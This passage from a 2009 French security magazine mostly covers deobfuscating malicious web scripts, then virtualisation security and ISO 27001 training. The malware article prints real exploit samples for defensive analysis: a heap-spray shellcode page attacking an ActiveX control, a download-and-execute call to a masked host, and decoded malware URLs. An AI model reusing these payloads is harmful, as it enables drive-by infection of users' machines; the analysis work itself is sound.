La cl de dcodage dpend alors de l'emplacement de la page - l'URI. Pour dboguer ce genre de script, vous devez avoir l'adresse originale, remplacer comme expliqu ci-dessus l'argument.callee avec sa valeur et ensuite hardcoder l'adresse directement dans le script ou surcharger l'objet location dans votre environnement de debug.
52
HAKIN9 2/2009
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
52
2009-01-06, 19:17
SCRIPTS MALICIEUX
2/2009 HAKIN9
53
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
53
2009-01-06, 19:17
TECHNIQUE
Ainsi, le code utilis pour dsoffusquer le script est prsent dans le Listing 7. L'appel la mthode eval dans la fonction pP5oMp5la a t remplac par un appel print . Listing 7. Insrer la cl
function pP5oMp5la(Vk6BQD4pI) { var q17vcDYfM="FUNCTIONPP5OM...XWA0EVALPYUAFDTK5"; var eYl6MWlW5; ... PyUafdtK5+=String.fromCharCode(VfrYI6V77); if(hec5KxXwa<EE7s4JBQo.length-1) { hec5KxXwa++;} else { hec5KxXwa=0; } } print(PyUafdtK5);
Nous obtenons alors le rsultat dans le Listing 8. Du code inutile a t ajout par la variable KoUXcxVN . Pour tre sr, il faudrait suivre le chemin vers l'autre page sur le mme serveur
ajout par ce script (setAttribute sur src) ; c'est pourquoi, comme prcis plus haut, il est vraiment important de connatre l'adresse d'un script pour tre en mesure d'approfondir l'analyse si besoin.
} pP5oMp5la('5250...424f');
Quelques auteurs de malwares empaquettent leurs scripts avec l'outil online fourni par Dean Edwards, il est facile de reconnatre ces scripts, ils commencent tous par la chane eval(function(p,a,c,k,e,d){ comme dans le Listing 9. Comme vous le voyez dans cet exemple, la chane est extraite du code original et mise la fin du script empaquet. Pour le dsoffusquer, remplacez l'appel de function eval() par la fonction print () et passez le script rsultant Rhino. Vous obtiendrez :
function CuteqqCn() {
wwwcuteqqcn["Dloadds"]
("http://bbb.xxxx.com/
calc.cab", "calc.exe",0)
Vous auriez pu aussi dterminer l'attaque en identifiant les chanes suspectes de la fin du script, mais il faut savoir quoi chercher. En regardant de plus prs le CLSID et le nom de la mthode Dloadds, vous verrez que cet exploit fait rfrence au CVE-2007-4105, il essaye d'crire l'insu de l'utilisateur un fichier tlcharg de http://bbb.xxxx.com/calc.cab. Pour vrifier que ce fichier est effectivement malicieux, vous pouvez le cross-scanner, il existe des services gratuits en ligne le permettant comme VirusTotal ou la sandbox de ThreatExpert.
Ce n'est pas une classe ou mthode Javascript ni Vbscript mais une fonctionnalit Microsoft. Microsoft Script Encoder tool screnc.exe a t cr par Microsoft en 2003, il a pour but d'encoder les scripts des pages pour prvenir toute modification. Cet outil de scurit a depuis t revers et quelques auteurs de scripts malicieux l'utilisent.
La fonctionnalit JS.encode
54
HAKIN9 2/2009
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
54
2009-01-06, 19:17
SCRIPTS MALICIEUX
Notez que ce code ne fonctionne qu'avec Microsoft Internet Explorer. Comment le dtecter ? L'attribut language de Javascript est renomm en Jscript.Encode et VBScript.Encode en VBScript. comme dans le Listing 10. La manire la plus simple de retrouver les donnes originales est d'utiliser la fonction de Malzilla Misc. Decoders Decode, JS.Encode. Vous pouvez aussi utiliser le code C du Listing 11 ou un des nombreux dcodeurs online.
Tout ce que nous avons vu jusqu' prsent utilise le langage cr par Netscape il y a quelques annes : Javascript. Cependant, comme vous devez le savoir, Microsoft a aussi fait son propre langage fond sur Visual Basic et appel VBScript. Microsoft Internet Explorer est le seul navigateur capable de comprendre Javascript et VBScript. Comme Microsoft est la premire cible des attaques, il est normal de voir des scripts malicieux utilisant cette technologie. Notez quil est possible de trouver des scripts utilisant les deux langages. Lautre point avantageux pour les auteurs de script malicieux et quil nexiste pas de dbogueur permettant de reproduire le comportement dun moteur VBScript. Quelles sont donc les solutions permettant de comprendre un script malicieux sans pour autant compromettre notre machine ? Vous pouvez convertir le code VB en JS mais il existe des mthodes plus simples et moins gnratrices d'erreurs, la mthode consiste utiliser un composant Microsoft ActiveX pour manuellement dboguer la couche d'offusquation tape par tape. Cette mthode est assez longue mais donne de bons rsultats. Le code cl est l'utilisation de la fonction WriteToFile base sur l'ActiveX Script ing.FileSystemObject, voir Listing 12. Ce code doit tre ajout dans le script que vous voulez dcoder. Il peut tre utilis pour crire n'importe quelle chane sur le disque dans le fichier par dfaut c:\test.txt. Nous allons prendre un exemple pour expliquer comment l'analyser en utilisant une mthode ActiveX dcrite ci-dessus, voir Listing 14 qui combine du code Javascript et du VBScript.
2/2009 HAKIN9 55
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
55
2009-01-06, 19:18
TECHNIQUE
Listing 14. Script en clair qui utilisait du Javascript et VBScript
<html> <body> <script language="javascript">window.onerror=function(){return true;}</script> <object classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2" style='display: none' id='target'></object> <SCRIPT language="javascript"> var url="%u7468%u7074%u2F3A%u772F%u7777%u312E%u7730%u7069%u632E%u6D6F%u792F%u 6861%u6F6F%u792F%u7365%u652E%u6578"; var el1s2kdo3r = "hi1265369"; var s1="%u9090%u9090"; ... var s23="%u6946%u656c%u0041"; var s=s1+s2+s3+s4+s5+s6+s7+s8+s9+s10+s11+s12+s13+s14+s15+s16+s17+s18+s19+s20+ s21+s22+s23+url; var shellcode = unescape(s); </script> <SCRIPT language="javascript"> var el1s2kdo3r = "hi1265369"; var ss="%u9090"; var bigblock = unescape(ss); var el1s2kdo3r = "hi1265369"; var headersize = 20; var el1s2kdo3r = "hi1265369"; var slackspace = headersize+shellcode.length; var el1s2kdo3r = "hi1265369"; while (bigblock.length<slackspace) bigblock+=bigblock; var el1s2kdo3r = "hi1265369"; fillblock = bigblock.substring(0, slackspace); var el1s2kdo3r = "hi1265369"; block = bigblock.substring(0, bigblock.length-slackspace); var el1s2kdo3r = "hi1265369"; while(block.length+slackspace<0x40000) block = block+block+fillblock; var el1s2kdo3r = "hi1265369"; memory = new Array(); var el1s2kdo3r = "hi1265369"; for (x=0; x<100; x++) memory[x] = block +shellcode; var el1s2kdo3r = "hi1265369"; var buffer = ''; var el1s2kdo3r = "hi1265369"; while (buffer.length < 1024) buffer+="\x05"; var el1s2kdo3r = "hi1265369"; var ok="1111"; var el1s2kdo3r = "hi1265369"; target.Register(ok,buffer); var el1s2kdo3r = "hi1265369"; </script> </body> </html>
Il faut tout d'abord identifier les deux tags script, l'un avec l'attribut langage JavaScript et l'autre VBScript, et ensuite la fonction nomme mymid dans le code Javascript qui est appele par le code VBScript. Nous devons identifier le flot d'excutions dans le code VBScript, la variable flag _ type est positionne html donc le script malicieux sera insr en utilisant le document.write qui suit. Nous devons donc ajouter la fonction WriteToFile dans le bloc de code Javascript et remplacer le document.write(D) par WriteToFile(D) (note: en VBScript il n'est pas ncessaire de terminer chaque ligne de code par un ';'). Vous obtenez alors le rsultat du Listing 14. Le script occasionne un composant ActiveX 7F5E27CE-4A5C-11D3-92320000B48A05B2 qui est le contrle ActiveX SSReader Pdg2, il embarque un shellcode, utilise une technique de Heap Spray pour remplir la heap et appelle une mthode nomme Register. En cherchant un peu, vous trouverez que la mthode Register est vulnrable un buffer overflow dans les anciennes versions de cet outil, comme dcrit dans CVE-2007-5807. Ce script essaie d'exploiter cette faille, la bonne nouvelle pour nous est que l'URL vers le virus peut tre rapidement identifie dans le code :
56
HAKIN9 2/2009
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
56
2009-01-06, 19:18
SCRIPTS MALICIEUX
var url="%u7468%u7074%u2F3A
Vous pouvez utiliser soit les fonctions de Malzilla Misc. Decoders Decode UCS2 (%u) ou le Listing 5 que nous avions prsent pour obtenir l'addresse malicieuse : http:// www.10wip.com/yahoo/yes.exe.
indiqu dans les chapitres prcdents. Si une chane trop longue est passe cette mthode, un buffer overflow se produira dans les anciennes versions d'Acrobat Reader, vous trouverez quelques informations sur cette vulnrabilit rfrence par le CVE-2007-5659 et le CVE-2008-5663. Cette faille a t patche dans Acrobat Reader depuis la version 8.1.2.
Adobe Flash embarque un langage de script nomm ActionScript fond sur ECMAScript (comme Javascript). C'est un langage puissant qui a t utilis rcemment par des personnes malintentionnes (en 2008) pour rediriger les utilisateurs vers des sites compromis. Une des mthodes consiste
Comme nous l'avons dj dit, il y a de plus en plus de vulnrabilits fondes sur des fichiers malicieux utilisant des failles dans les moteurs Javascript d'outil comme Acrobat Reader. Si vous ditez le fichier, vous verrez le type MIME %PDF au dbut du fichier suivi dans le corps par le stream suivant /Filter/ FlateDecode. Note : il est aussi possible de trouver des samples contenant le code en clair. Le Listing 15 reprsente un extrait de fichier PDF malicieux. Pour extraire le code original du stream, vous pouvez utiliser le script Perl du Listing 16. Il prend un argument qui est le nom du fichier contenant le stream dzipper. Le stream zipp est le code apparaissant entre les tags /Filter/ FlateDecode et endstream.enobj. Vous devez aussi supprimer les 0x0d 0x0a du dbut et fin de stream. En utilisant ce script sur notre exemple, nous obtenons en rsultat le Listing 17. La variable sc qui contient le shellcode est utilise par la variable plin qui est passe la mthode Collab.collectEmailInfo si la version du viewer est plus grande ou gale 6.0 Pour savoir ce que le shellcode fait, vous pouvez le dboguer avec IDA comme
2/2009 HAKIN9
57
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
57
2009-01-06, 19:18
TECHNIQUE
utiliser les commandes ActionScript qui sont reprsentes par le tag DoAction embarqu dans les frames. Si vous avez dj utilis un diteur hexadcimal pour ouvrir un fichier .swf, vous avez peut-tre vu qu'il existe deux formats qui sont identifiables par leur en-tte, les trois premiers octets identifient le format flash ainsi FWS est l'ancien format non compress et CWS identifie les fichiers compresss pour Adobe Flash version 8 minimum. Pour dcoder les fichiers flash, le plus simple est d'utiliser les outils gratuits existant comme swfdump flashm, vous pouvez voir un exemple de leur utilisation dans le Listing 18 et Listing 19. De ces deux listings, nous constatons que nos fichiers flash sont compresss et contiennent du code. DOACTION. Une fois ouvert le flash redirige la victime vers http://o7n9.cn/i.swf utilisant GetUrl2 comme nomm par swfdump ou loadMovie par flashm . Il
Sur Internet
Explication du Kill-bit: http://support.microsoft.com/kb/240797 Rhino: http://www.mozilla.org/rhino/ Malzilla: http://malzilla.sourceforge.net/ Encodeur Alpha: http://skypher.com/wiki/ index.php?title=ALPHA3 Prsentation d'Alexander Sotirov Black Hat 2007 http://www.blackhat.com/presentations/ bh-europe-07/Sotirov/Presentation/bheu-07-sotirov-apr19.pdf Heap Spray sur Wikipedia: http://en.wikipedia.org/wiki/Heap_spray Rfrence Linux System Call: http: //www.digilife.be/quickreferences/QRC/ LINUX%20System%20Call%20Quick%20R eference.pdf Empaqueteur de Dean Edward: http://dean.edwards.name/packer/ http://www.virustotal.com/ http://www.threatexpert.com/submit.aspx screnc.exe tool: http://www.microsoft.com/downloads/ details.aspx?familyid=E7877F67-C4474873-B1B0-21F0626A6329&displaylan g=en Dcodeur en C JS.encode : http://www.virtualconspiracy.com/ download/scrdec18.c Dcodeur online JS.encode: http://www.greymagic.com/security/ tools/decoder/
serait hors sujet ici d'analyser cet autre script flash, mais pour votre information le fichier i.swf essaie d'exploiter une faille dans Defi neSceneAndFrameData pour excuter du code arbitraire (CVE-2007-0071).
Conclusion
Dans ce document, nous avons fourni quelques astuces permettant de comprendre les scripts malicieux. Comme ce vecteur d'attaques devient de plus en plus important, il y a de grands risques que vous soyez un jour face l'un d'eux. C'est une bonne pratique de bloquer les ActiveX en utilisant des systmes de protection comme IPS/AV, mais il faut aussi dtecter les fichiers malicieux que ces vecteurs d'attaques tentent de tlcharger et d'excuter.
David Maciejak
David Maciejak travaille pour la socit Fortinet comme Security Researcher, son travail consiste suivre l'volution des menaces afin de fournir une solution prventive aux clients. Pour contacter l'auteur : David.Maciejak@gmail.com
58
HAKIN9 2/2009
48_49_50_51_52_53_54_55_56_57_58_Javascript.indd
58
2009-01-06, 19:18
SecureIP Solutions
La scurit de linformation est une chose importante pour les entreprises et mme pour les particuliers. Cest pourquoi SecureIP Solutions vous propose diffrents produits et services pour protger vos prcieuses donnes tels quun service de sauvegarde en ligne, les diffrents produits BitDefender et bien plus encore. http://www.secureip.ca
NUMERANCE
NUMERANCE, Spcialise dans la scurit informatique, intervient auprs des Petites et Moyennes Entreprises, en proposant des prestations daudit, daccompagnement, et de formation. http://www.numerance.fr
Herv Schauer Consultants : 17 ans d'expertise en Scurit des Systmes d'Information Nos formations techniques en scurit et ISO27001 sont proposes Paris, Toulouse, et Marseille. http://www.hsc.fr/services/formations/cataloguehsc.pdf Informations : formations@hsc.fr - +33 (0)141 409 704
TippingPoint
TippingPoint est un leader mondial dans la prvention des intrusions rseaux (Network IPS) de 50Mbps 10Gigabits ainsi que la vrification dintgrit de poste et le contrle daccs du rseau (NAC). Tl : 01 69 07 34 49, E-mail : francesales@tippingpoint.com http://www.tippingpoint.com
Sysdream
Cabinet de conseil et centre de formation spcialis en scurit informatique. Lexprience c'est avant tout les recherches publiques, visant amliorer la scurit des applications et des systmes dinformations. Les rsultats disponibles sur des portails de recherche, dans la presse spcialiss. http://www.sysdream.com
MICROCOMS
Microcoms est une socit spcialise dans les produits Microsoft qui a pour vocation d'aider les particuliers, les TPE-PME et les professions librales sur 6 axes principaux de l'informatique : Assister, Dpanner, Conseiller, Scuriser, Former, Maintenir. Tl. : 01.45.36.05.81 e-mail : contact@microcoms.net http://www.microcoms.net
Club .PRO
ALTOSPAM
Ne perdez plus de temps avec les spams et les virus. Scurisez simplement vos emails professionnels. ALTOSPAM est un logiciel externalis de protection de la messagerie lectronique : anti-spam, anti-virus, anti-phishing, anti-scam... Testez gratuitement notre service, mis en place en quelques minutes. http://www.altospam.com OKTEY 5, rue du Pic du Midi 31150 GRATENTOUR
59_prenumerata_PRO.indd
2009-01-05, 18:22
FOCUS
GRGORY CARLET
Approche
de la virtualisation des postes de travail
Depuis quelque temps, nous apercevons un nouveau concept dans de nombreux magazines spcialiss ou mme grand public : la virtualisation. Dans cet article, nous allons voir ce qu'est exactement ce procd, ainsi que son utilit. Nous vous montrerons les diffrentes mthodes de virtualisation ainsi que la manire de les mettre en uvre.
Degr de difficult
ujourd'hui, de nombreux appareils se trouvent connects Internet : tlphone, ordinateur portable, ordinateur personnel, etc. Ceci pose alors un problme de base : Sur quoi faut-il stocker ses documents afin de pouvoir les consulter en permanence. Effectivement, on aimerait pouvoir consulter tranquillement depuis son tlphone portable un fichier quelconque et tlcharg, mais comment faire ? On pense alors trs rapidement mettre en place un disque dur connect Internet et sur lequel on va transfrer tous nos fichiers. La prochaine tape est l'utilisation des logiciels pour effectuer cette tche. Prenons un exemple : Mr X a reu par mail un fichier Urgent.dufz sur son ordinateur de bureau. Celui-ci contient des comptes rendre vrifis son patron le lendemain matin et la premire heure. Il est 18h et Mr X doit rcuprer sa femme au travail dans 10min. Il ne peut donc le faire maintenant. Il rcupre ses affaires et part la gare, pensant travailler chez lui ce soir. Arriv la gare, on lui annonce que le train 1h de retard. Il prend donc son tlphone, se connecte Internet, rcupre son fichier qu'il a plac sur son disque dur rseau, mais l problme ! Le fichier .dufz ne s'ouvre qu'avec le logiciel CompteDufz et celui-ci n'est disponible que pour Windows XP. Ainsi il y a 2 solutions au moins ce problme : Tendre vers un OS (Operating System) unique pour tous les appareils : Trs difficile
compte tenu de la diversit des machines (entre un tlphone, un baladeur numrique, un ordinateur, etc...) et de surcroit pas trs lgal dans de nombreux pays (position de monopole), Ne plus tre dpendant de l'OS de notre machine pour faire fonctionner tel ou tel logiciel.
La deuxime solution s'appelle la virtualisation. Il s'agit en fait de faire fonctionner les logiciels sur une autre plateforme qui va venir se greffer sur notre OS. Il y a 2 cas trs distincts de fonctionnement de la virtualisation : Faire fonctionner sur tel OS (par ex : Mac OS) un logiciel destin une autre plateforme (par ex : XP), Faire fonctionner distance via Internet un ordinateur spar fonctionnant avec un OS diffrent (par exemple Symbian et Linux).
60_61_62_63_64_65_wirtualizacja_fr_mt2.indd
60
2009-01-05, 19:41
Commentons maintenant les problmes pouvant rsulter d'une telle configuration. Le fait qu'une seule machine fasse fonctionner des ressources alloues de manire autonome nous amne nous poser une question : Que se passerait-il si il y avait une mauvaise allocation des ressources ou pire si on effectuait une mauvaise allocation des ressources ? En effet, de nombreuses failles systmes se basent sur un principe de BufferOverflow (dpassement de mmoire tampon). Si celui-ci est effectu l'intrieur de l'OS principal, on se retrouve avec une faille classique, mais si l'on effectue celui-ci l'intrieur de l'OS virtualis, dans le pire des cas, on vient simultanment crire des donnes sur des ressources non attribues cet OS virtualis mais alloues au premier
60_61_62_63_64_65_wirtualizacja_fr_mt2.indd
61
2009-01-05, 18:22
FOCUS
qu'un ordinateur sur lequel fonctionnent plusieurs OS reste plus vulnrable qu'un ordinateur n'en faisant fonctionner qu'un seul (voir le lien Internet 6). On aura donc intrt bien rflchir son besoin la fois en terme de fonctionnalit et en terme de scurit avant de mettre en place une solution virtualise. Ainsi pour rsumer cette utilisation de la virtualisation, celle-ci permet de faire ce qu'aucun ordinateur ne peut faire nativement : excuter tous les programmes existants indpendamment de leur plateforme de production. Malheureusement cela un double cot : les performances globales de la machine et la scurit de celle-ci. Revenons quelque instant M.X souhaitant relire ses comptes au format .dufz en attendant sa femme la gare. Cette solution de virtualisation ne lui est d'aucune utilit, moins de virtualiser Windows XP sur son tlphone (trs difficile d'un point de vue ressource, mme en choisissant la virtualisation d'une version Windows Mobile..). Intervient ici la deuxime utilisation de la virtualisation des postes de travail : le dport du bureau sur une machine hte laquelle on accde via un rseau de communication. conservera tout de mme les points d'accs physiques (ports USB, Firewire, Ethernet, etc) ncessaire son fonctionnement. En rsum, cette machine devra tre dote de moyens d'interaction avec l'utilisateur mais ne devra pas forcment possder une norme puissance de calcul et de stockage. On a donc une rduction des cots informatiques variant de faon constante en fonction du nombre de postes clients utiliss et une mobilit extraordinaire du personnel. On peut aisment imaginer un lecteur commun entre tous les utilisateurs des OS virtuels permettant ainsi chacun de partager un travail collectif et de grer celui-ci de n'importe o. Le travail de bureau dlocalis devient donc accessible n'importe qui grce la mthode de virtualisation. Mais pour cela, il faut penser plusieurs choses (certaines ayant dj t voques dans le paragraphe prcdent) : La machine accueillant les OS virtuels sera fortement prouve question ressource, et ceci dpendant
ORDINATEUR PHYSIQUE
Aoolicationes de l'OS 2
Applications de l'OS 1
OS 2
Aoolicationes de Virtualisation
OS 1
Ressources matrielles
Affichage
Actions utilisateurs
OS Client
OS Hte
Ressources matrielles
Ressources matrielles
Figure 3. Fonctionnement simultan de Windows XP et Mac OS sur le mme ordinateur en bi-cran (chaque cran montrant chaque OS)
62
60_61_62_63_64_65_wirtualizacja_fr_mt2.indd
62
2009-01-05, 18:23
Commenons ce paragraphe par un petit schma trs simplifi mais permettant nanmoins de comprendre o vont se situer les problmes de scurit d'une telle configuration. Celui-ci est donn en Figure 5. On s'aperoit ainsi qu'il y a 4 points critiques principaux dans une telle architecture : Le flux d'informations arrivant l'ordinateur hte. S'il a t corrompu, il y a un risque norme de compromission de l'OS avec des
Tout d'abord, les deux premiers points sont assez similaires : les deux seules mthodes d'attaques sur les postes hte et client sont la compromission des donnes envoyes (ou reues) par ceux-ci, ou un envoi d'information depuis un poste tiers, directement sur les
ordinateur client 1
Routeur 1
Ordinateur hte 1
ordinateur client 2
Ordinateur hte 2
.........
Routeur de secours
HUB
La Figure 4 rsume de manire schmatique la mise en place d'un rseau de virtualisation de poste de travail et les premires solutions de secours envisageables lors de la mise en place d'un tel systme de travail. Le routeur de secours ne sert qu'en cas de panne ou de maintenance du routeur principal. Les multiples ordinateurs htes servent grr plusieurs connections clientes, et de plus peuvent permettre de combler une panne ou de la maintenance sur l'un des postes. La partie client estla partie la plus simple grr puisque l'on peut admettre une panne (facilement remplacable par n'importe quel nouvel utilisateur), alors que la partie droite doit tre compltement gre et doit prendre en compte les problmes de panne de manire rapide et sans aucun dommage pour l'utilisateur. Une fois tout ceci mis en place (ou seulement conu), il reste toutefois un point
ordinateur client N
Ordinateur hte N
Ordinateur client
Ordinateur hte
Ordinateur attaquant
Ordinateur attaquant
Ordinateur attaquant
60_61_62_63_64_65_wirtualizacja_fr_mt2.indd
63
2009-01-05, 19:36
FOCUS
ordinateurs. On peut toutefois noter qu'il est plus intressant d'attaquer l'ordinateur hte que le client. En effet, on le dtaillera plus tard, mais l'ordinateur hte risque de contenir plus de donnes personnelles que l'ordinateur client. Pour revenir au flux d'informations arrivant aux deux ordinateurs, si elles sont corrompues (peu importe le moyen et le but), on risque de crasher l'un des deux systmes (voir les deux). Il s'agit donc de protger les deux ordinateurs de ce genre de problme. Pour cela, un firewall et un antivirus, permettront (dans un premier temps) d'viter le plus gros des problmes. Par la suite, la mise en place de restrictions des connexions aux deux postes pourra tre mise en place, et les manquements ces restrictions pourront (et devront) tre tudis de prs par une personne tierce. Ceci est le rle du superviseur rseau. En plus des oprations de maintenance pouvant (devant dans l'idal) tre effectues par quelqu'un d'autre selon l'importance de l'entreprise, celui-ci devra surveiller tous les trafics frauduleux d'informations arrivant sur les deux postes (client et hte) et affiner les rgles de filtrages d'informations sur les deux ordinateurs. De plus, notre machine client est potentiellement vulnrable aussi. En effet, puisque les ports physiques de la machine soient accessibles l'utilisateurs. Il y a donc possibilit que celui-ci dispose d'un accs la machine. On peut donc facilement imaginer un attaquant qui utilise une cl USB ou un LiveCD pour attaquer le systme hte. Ainsi, si l'attaque a t prpare l'avance, les outils pourront tre facilement chargs sur la machine hte. Il faut donc prvoir cette introprabilit entre l'utilisateur et la machine et imaginer les risques de compromission afin de les radiquer. Un des points les plus sensibles en cas de corruption reste souvent l'inaccessibilit des donnes l'attaquant. Aucune donne crypte n'est dcryptable. Il s'agit uniquement d'un rapport entre le temps de dcryptage en fonction de la puissance de calcul et la motivation (intrt) de l'attaquant. Ainsi, on rduit le risque de dcryptage si l'attaquant est oblig de les dcrypter sur la machine (par exemple si les fichiers ne sont ni dplaable, ni copiable). Il en rsultera un abandon forc de la part de l'attaquant pour viter tout reprage. Afin de garantir une confidentialit des donnes prsentes sur le disque dur de la machine hte, nous commencerons par crypter celles-ci l'aide d'un algorithme assez rsistant ( dfinir en fonction de la confidentialit des donnes protger. Nous dfinions ensuite une politique de scurit sur tous les fichiers et dossiers crs dans chaque machine virtuelle sur la machine hte afin que seul le propritaire de la machine virtuelle puisse y accder l'aide d'un challenge ( dfinir encore en fonction de la confidentialit des donnes). Il y a peu d'intrt crypter avec un algorithme complexe une photo de vacances! Par contre, une double authentification pourrait tre envisage lors des accs aux fonctions de maintenance de la machine hte, ou un accs en mode super-utilisateur. De nombreux ouvrages (en livre ou sur le net, donnent de bonnes informations sur les politiques de protection des donnes, sur les changements rguliers de mot de passes chez les utilisateurs, etc. Nous vous invitons donc les consulter avant de mettre en place un rseau (en mode virtualis ou non d'ailleurs). Passons maintenant la partie contenant le plus de risque de scurit, le canal de transport des informations entre l'ordinateur client et l'ordinateur hte. En effet, si nous reprenons le schma de la Figure 4, nous pouvons facilement imaginer le cas o la machine virtualise ne se situe pas proximit de l'ordinateur client. La liaison entre les deux empruntera forcment le rseau Internet afin de connecter les deux ordinateurs. Mous peuvons donc facilement imaginer que l'attaquant cherchera faire une attaque de type Man-In-The-Middle afin d'obtenir de faon transparente toutes les informations (mot de passe, correspondance, etc) ncessaires usurper l'identit du client sur l'ordinateur hte et finalement rcuprer toutes les donnes confidentielles. Ce type d'attaque est le plus risqu dans le cas prsent. En effet, malgr toutes les protections mises en place, si l'attaquant se fait passer pour le vritable propritaire rien ne parat
Terminologie
Operating System (OS ou Systme d'exploitation en franais) : C'est un ensemble d'applications permettant la liaison entre la couche matriel de l'ordinateur (mmoire, processeur, etc) et les applications (traitement de texte, etc), Man In The Middle (MITM ou Attaque de l'Homme du Milieu en franais) : C'est un type d'attaque informatique consistant se placer de manire discrte entre deux postes de communication. Cette attaque n'est possible qu'en deux tapes : une phase d'observation des donnes changes entre les deux postes, suivie d'une inclusion de manire invisible entre les deux postes, Brute Force (ou attaque de Force Brute en franais) : C'est une mthode d'attaque pour casser une cl crypte en essayant toutes les possibilits. La dure de russite est donc trs dpendante de la puissance de calcul et de la longueur de la cl de cryptage, SSH (Secure Shell) : C'est la fois un protocole de transmission et un programme informatique. Le principe du protocole de transmission est d'changer des cls cryptes en dbut de transmission puis de transmettre toutes les donnes de manire cryptes par la suite.
Sur Internet
http://www.vmware.com/fr/ VMWare (multi-plateforme), http://www.parallels.com/ Parrallel (multi-plateforme), http://www.virtualbox.org/ VirtualBox (multi-plateforme), http://www.microsoft.com/france/windows/xp/virtualpc/default.mspx VirtualPC (Windows uniquement), http://xperts.sce.carleton.ca/2004-05/MITMV/ Attaque Man-In-The-Middle sur une connexion SSH. Page et rapport final en anglais uniquement mais extrmement complet. Le rapport se trouve sous le lien final report, http://www.journaldunet.com/solutions/securite/actualite/07/0914-virtualisation-risquessecurite.shtml Rapport de scurit sur les OS virtuels. Il s'agit d'un article d'un journal franais rsumant les problmes de base de la virtualisation d'un point de vue scuritaires, http://fr.wikipedia.org/wiki/Virtualisation La page Wikipdia sur la virtualisation, http://www.google.fr/search?num=200&hl=fr&q=virtualisation+securit%C3%A9 Une simple recherche Google mais contenant normment de lien trs intressant et souvent mis jour. Essentiel si vous souhaitez mettre en place votre solution virtualise.
64
HAKIN9 2/2009
60_61_62_63_64_65_wirtualizacja_fr_mt2.indd
64
2009-01-05, 18:23
Conclusion
La virtualisation dispose de deux intrts majeurs : la facilit d'utilisation, ainsi que la concentration des postes de travail diffrents en un seul, aussi la mobilit. Mais cela ne se fait pas sans heurt et peut rapidement se faire au dtriment des performances et de la scurit des donnes transfres. Il vous revient de dfinir les priorits et concessions possibles lors de la mise en place de ce type de systme. Grgory Carlet
Il y a maintenant 6 ans, l'auteur dcouvre l'utilisation d'un poste informatique et sa passion pour la scurit informatique et les rseaux. Pour le contacter : gregory.carlet@gmail.com
2/2009 HAKIN9
65
60_61_62_63_64_65_wirtualizacja_fr_mt2.indd
65
2009-01-05, 19:36
FOCUS
HERV SCHAUER
Dans les formations en scurit, les formations avec une certification autour des normes ISO 27001 se sont fortement dveloppes depuis quelques annes. Le point pour y voir plus clair et savoir en profiter.
ppliquer la norme ISO 27001 permet d'organiser la scurit de l'information dans son organisme. Cela peut aller jusqu' la certification du Systme de Management de la Scurit de l'Information de l'organisme, SMSI, ou ISMS en anglais. En marge de la certification des systmes de management eux-mmes, s'est dveloppe la certification des individus, des personnes, afin de leur permettre de prouver leurs comptences. Ces certifications permettent de savoir quels sont ceux qui connaissent les principes de l'ISO 27001, et qui auront acquis les connaissances pour auditer ou implmenter un SMSI. La formation de tous ceux impliqus dans un SMSI est une exigence de l'ISO 27001 dans la mise en uvre du SMSI, article 4.2.2.e qui renvoi au 5.2.2. La certification de comptences, si elle est srieuse et impartiale, est le moyen le plus simple de savoir si un individu rpond a ses attentes en terme de connaissance du sujet.
Comment grer les risques dans un SMSI ? Comment auditer un SMSI selon les critres de l'ISO 27001 ?
La gestion de risque est la partie la plus complexe de la mise en oeuvre d'un SMSI (dans la phase PLAN de l'ISO 27001), et elle est obligatoire. L'audit interne est le premier mcanisme de vrification dans un SMSI (phase CHECK dans l'ISO 27001). De plus il permet aussi de certifier. C'est pour ces raisons que les certifications disponibles se dcoupent en trois formations : Les formations ISO 27001 Lead Implementer permettent d'apprendre mettre en oeuvre un SMSI. Elles durent gnralement 5 jours. Les formations ISO 27005 Risk Manager permettent d'apprendre grer les risques en scurit de l'information. Elles durent gnralement 3 jours. Les formations ISO 27001 Lead Auditor permettent d'apprendre auditer un SMSI. Elles durent gnralement 5 jours.
Comment mettre en place un systme de management de la scurit de l'information (SMSI) conforme la norme ISO 27001 ?
Selon de votre fonction, l'une, l'autre ou plusieurs d'entre elles rpondront vos besoin. Celui qui sera la fois implmenteur, gestionnaire de risques SI et auditeur est gnralement le RSSI (Responsable de la Scurit des Systmes d'Information) dans son organisme.
66_67_68_69_Pod_Lupa.indd
66
2009-01-05, 19:46
01
Les formations alternent gnralement cours magistraux et exercices individuels ou en groupe, avec plusieurs formateurs pour mieux encadrer les travaux dirigs. Le contenu des cours magistraux est bas sur les normes : ISO 27001 pour le SMSI, ISO 27002 pour les mesures de scurit, ISO 19011 pour l'audit de systme de management, ISO 27005 pour la gestion de risques, etc. C'est l'exprience du formateur qui permet d'apporter une comprhension aise des documents parfois rbarbatifs, il convient donc de bien valider l'exprience sur le terrain de ses formateurs.
s'aidant des ressources disponibles sur internet ou des livres. Les certifications des personnes sur les normes ISO 27001 imposent le suivi de la formation avant.
Dans ISO 27001 Lead Auditor, ISO 27001 rfre la norme ISO. Ce qui diffrencie une certification ISO 27001 ou ISO 27005 et une certification CISSP, c'est que d'un cot le rfrentiel est une norme, dans l'autre cas il ne l'est pas. Une norme ISO est un document ouvert, accessible tous, qui a t dvelopp de manire consensuelle afin que tous les experts de tous les pays du monde se mettent d'accord. Chaque pays vote formellement chaque nouvelle version du projet de norme et envoie ses commentaires qui sont traits un par un par le groupe de normalisation international qui justifie toutes ses dcisions une par une. Bien que la socit ISC2 ait dit un livre qui sert de rfrence, il n'y a pas de rfrentiel ouvert sur lequel les examens sont bass. La socit ISC2 qui dite le CISSP est la seule dfinit et connatre son rfrentiel et aucune autre socit que ISC2 ne peut faire de certification CISSP. Dans CISSP il y a Information Security. C'est une certification sur la connaissance du candidat en scurit de l'information. Les certifications sur les normes ISO couvrent en profondeur un champ beaucoup plus limit qui est l'organisation de la scurit, et une formation ISO 27001 Lead Auditor est avant tout une formation l'audit de systme de management, pas une formation la scurit. Enfin la certification au CISSP peut se passer en candidat libre, sans avoir suivi une formation particulire auparavant, en
